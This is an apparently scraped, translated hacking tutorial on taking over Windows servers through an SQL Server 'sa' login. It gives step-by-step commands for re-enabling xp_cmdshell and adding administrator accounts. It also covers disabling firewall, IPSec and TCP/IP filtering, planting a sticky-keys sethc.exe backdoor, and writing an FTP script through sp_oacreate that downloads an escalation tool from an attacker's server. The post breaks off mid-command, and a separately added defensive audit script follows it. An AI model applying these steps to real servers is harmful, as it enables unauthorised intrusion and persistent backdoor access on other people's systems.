1433 privilege escalation: detailed process

Source: Internet
Author: User
Tags: sql server books


The following are several errors encountered when executing commands as sa:
1. Unable to load DLL xpsql70.dll or one of the DLLs it references. Reason 126 (the specified module could not be found).
This situation is common. The fix is simple but conditional. If the directory can be listed (sqltools v2.0 has a directory-listing function), then roughly 80% of these cases can be fixed: you only need to find the path of xplog70.dll and execute the following commands.
Step 1
EXEC sp_dropextendedproc 'xp_cmdshell'   (this deletes the original xp_cmdshell, since it is now broken)
Step 2
DBCC addextendedproc("xp_cmdshell", "c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll")
;EXEC sp_configure 'show advanced options', 0--
Of course, these are SQL commands, executed with Query Analyzer. In step 2, c:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll is the path of xplog70.dll, which is the usual location. If it is not on drive C, look for it on the other drive letters.
2. Cannot find function xp_cmdshell in library xplog70.dll. Reason: 127 (the specified procedure could not be found).
This is actually the same as the 126 case above: xp_cmdshell is broken, so you only need to find a backup xplog70.dll and repair it using the method above.
3. Could not find stored procedure 'master..xp_cmdshell'
For this case, the method I see on the internet is:
Step 1, delete:
DROP PROCEDURE sp_addextendedproc
DROP PROCEDURE sp_oacreate
EXEC sp_dropextendedproc 'xp_cmdshell'
Step 2, restore:
DBCC addextendedproc("sp_oacreate", "odsole70.dll")
DBCC addextendedproc("xp_cmdshell", "xplog70.dll")
This is actually the same as above. If you look carefully, in the 126 and 127 cases above, once only step 1 has been executed you will get "Could not find stored procedure 'master..xp_cmdshell'", because step 1 deletes the xp_cmdshell stored procedure. In that case you only need to perform step 2 above.
4. Error message: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
This is the simplest case, because there is nothing to worry about; simply execute the following commands:
;EXEC sp_configure 'show advanced options', 1--
;RECONFIGURE WITH OVERRIDE--
;EXEC sp_configure 'xp_cmdshell', 1--
;RECONFIGURE WITH OVERRIDE--
;EXEC sp_configure 'show advanced options', 0--

After the fixes above, cmd commands can be executed, and the next step is privilege escalation. I usually run ipconfig to see whether the IP address is an intranet address, then run reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber to check the terminal port, run netstat -an to check whether the terminal service is listening, and then run net user <user> <password> /add to add a user and net localgroup administrators <user> /add to make that user an administrator. With that, the server is taken. However, there are still many problems in this process.
1. net privilege escalation succeeds but the terminal cannot be connected to. The following situations exist:
(1) The server is on an intranet.
(2) TCP/IP filtering.
Run the following cmd commands:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip   (exports the first TCP/IP filtering entry from the registry)
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip   (exports the second TCP/IP filtering entry from the registry)
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip   (exports the third TCP/IP filtering entry from the registry)
Then go to drive C, download 1.reg, 2.reg and 3.reg to your own hard disk and edit them. Find the EnableSecurityFilters field and check whether the dword value after it is 00000000. If it is 00000001, the administrator has enabled TCP/IP filtering, and we only need to change that 1 to 0 in the .reg files.
(3) An IP security policy has been applied.
Run the cmd command cmd /c net stop policyagent to stop the IPSEC Services service, then connect to the terminal again.
(4) The administrator has restricted terminal login permission to specified users only.
(5) Firewall. Run the cmd commands net stop alg /y and net stop sharedaccess.

2. Access denied during net privilege escalation
Try net1 user <user> <password> /add. If net1 is also rejected, copy a shift backdoor with the cmd command copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
If the prompt says 1 file(s) copied, the copy succeeded. Connect to the terminal, press Shift five times and see what comes up. Now you only need to add a user manually from Explorer.
3. Access denied (error 5) during net privilege escalation (important)
In this case there is no need to try net1; you can try the shift backdoor copy. If the prompt says 0 file(s) copied after the copy operation, the copy did not succeed. You can try to upload a file: if you can upload directly, upload the privilege escalation tool that does not depend on net (released some time ago) and then add a user. However, in most of these cases uploading is not possible, so consider this: since cmd can be executed, a file can be downloaded through ftp under cmd, but the ftp commands must be written into a text or batch file, and SQL statements can be used to write that text or batch file.
DECLARE @o int, @f int, @t int, @ret int
EXEC sp_oacreate 'scripting.filesystemobject', @o out
EXEC sp_oamethod @o, 'createtextfile', @f out, 'c:\1.bat', 1
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'open <ftp IP>'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, '<ftp account>'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, '<ftp password>'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe c:\en.exe'   (en.exe is the privilege escalation script that does not depend on net)
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'bye'
After this is executed successfully in Query Analyzer, 1.bat will appear on drive C. (If the execution succeeds but drive C does not show the file, change the folder written to, because the root of the server's drive C cannot be written to.)
Then run the cmd command ftp -s:c:\1.bat.
After this finishes, the non-net escalation script, or a vbs escalation script, will have been downloaded from the ftp server to drive C.
DECLARE @o int, @f int, @t int, @ret int
EXEC sp_oacreate 'scripting.filesystemobject', @o out
EXEC sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'Set o = CreateObject("Shell.Users")'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'Set z = o.create("user")'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'z.changePassword "password", ""'
EXEC @ret = sp_oamethod @f, 'writeline', NULL, 'z.setting("AccountType") = 3'
Then run the cmd command cscript c:\1.vbs.
4. As mentioned above, cmd commands can be executed successfully, but after some of the fixes new problems may appear.
(1) Message: An error occurred while executing xp_cmdshell. The call to CreateProcess failed. Error code: 5.
The 5 is the error number reported by the system; CreateProcess refers to creating a process. This error message has a lot to do with the system file cmd.exe: either cmd.exe has been deleted, or its permissions have been reduced.
SQL to view the terminal port and whether it is open:
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp', 'PortNumber'
Well, the key point is this: we need two SQL commands to copy the system's explorer file as the shift backdoor file. The following two statements are executed separately.
Copy explorer.exe to sethc.exe:
DECLARE @o int; EXEC sp_oacreate 'scripting.filesystemobject', @o out; EXEC sp_oamethod @o, 'copyfile', null, 'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe';
Copy sethc.exe to the dllcache directory:
DECLARE @oo int; EXEC sp_oacreate 'scripting.filesystemobject', @oo out; EXEC sp_oamethod @oo, 'copyfile', null, 'c:\windows\system32\sethc.exe', 'c:\windows\system32\dllcache\sethc.exe';
In addition, the sp_oacreate stored procedure used by these two statements depends on the odsole70.dll file, so whether that file still exists determines whether the object creation succeeds or fails.
(2) xpsql.cpp: Error 5 from CreateProcess (line 737)
This situation is tricky.
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE', 'SoftWare\Microsoft\Jet\4.0\Engines', 'SandBoxMode', 'REG_DWORD', 0
SELECT * FROM OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'select shell("net user 123 123 /add")');
SELECT * FROM OpenRowSet('Microsoft.Jet.OLEDB.4.0', ';Database=c:\windows\system32\ias\ias.mdb', 'select shell("net localgroup administrators 123 /add")');
This adds the user directly. I looked into the sandbox escalation method to check this, but in my practice the success rate is very low, because on most servers c:\windows\system32\ias\ias.mdb has been deleted. You can try image hijacking of sethc. Of course, image hijacking is also conditional: 1. it requires xp_regwrite; 2. the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe, with its Debugger value, must not have been deleted.
You can run the following SQL command to check whether the registry key used for hijacking still exists:
EXEC master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe', 'Debugger'
If it reports that the value was not found, it has been deleted and this method cannot be completed; if it returns sethc.exe, execute the SQL command
EXEC master..xp_regwrite
@rootkey = 'HKEY_LOCAL_MACHINE',
@key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ima
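As a counterpart from the defender's side, this added audit script (not part of the original post) lists the server-level options and the registry value that the steps above rely on, and ends with the corresponding hardened configuration; it assumes SQL Server 2005 or later, where sys.configurations exists, and a sysadmin login.

```sql
-- Added defensive audit script (not part of the original post).
-- Assumes SQL Server 2005 or later (sys.configurations exists) and a
-- sysadmin login. It reports the server options and the sethc.exe IFEO
-- Debugger value that the post's steps depend on, then shows the
-- hardened values.

-- 1. Server options used above: xp_cmdshell, OLE Automation (sp_oacreate)
--    and ad hoc OPENROWSET (the Jet sandbox trick). Expected value_in_use = 0.
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell',
               'Ole Automation Procedures',
               'Ad Hoc Distributed Queries');

-- 2. Logins holding sysadmin: 'sa' should be disabled or renamed, and
--    application logins should not appear in this list at all.
SELECT p.name, p.is_disabled
FROM sys.server_principals AS p
JOIN sys.server_role_members AS rm ON rm.member_principal_id = p.principal_id
JOIN sys.server_principals AS r  ON r.principal_id = rm.role_principal_id
WHERE r.name = 'sysadmin';

-- 3. Image File Execution Options for sethc.exe: any Debugger value here
--    means the sticky-keys binary has been redirected to another program.
--    xp_regread leaves @debugger NULL when the key or value is absent.
DECLARE @debugger nvarchar(260);
EXEC master..xp_regread
    @rootkey    = 'HKEY_LOCAL_MACHINE',
    @key        = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
    @value_name = 'Debugger',
    @value      = @debugger OUTPUT;
SELECT ISNULL(@debugger, '(not set)') AS sethc_debugger;

-- 4. Hardened configuration: turn the three options off again.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
```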
